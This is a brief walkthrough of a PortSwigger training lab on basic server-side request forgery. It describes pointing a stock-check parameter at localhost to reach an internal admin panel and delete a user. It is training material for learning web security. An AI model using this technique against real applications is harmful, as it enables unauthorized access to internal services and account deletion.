Lab 1: Basic SSRF against the local server

Lab 1 regarding the Server-Side Request Forgery (SSRF) vulnerability from PortSwigger.

Basically, we have an application with multiple products. By clicking on "View details" and then clicking on "Check stock," the product's inventory will be verified.

However, upon analyzing the request with Burp Suite and testing the "stockApi" parameter, when we input "http://localhost:80," the internal application is exactly returned. Therefore, we are able to interact with the internal environment. To solve the lab, we need to delete the user "carlos."

When testing the /admin endpoint, the application returned the administrative panel. Upon observing the response, we can identify the presence of two users, "carlos" and "wiener," followed by an href referencing the path to delete one of the users.

After finding the required endpoint to delete the account, we can easily do it using the "stockApi" parameter, and the lab will be successfully completed!

PreviousSSRF NextXSS ( Cross-Site Scripting )

Last updated 1 year ago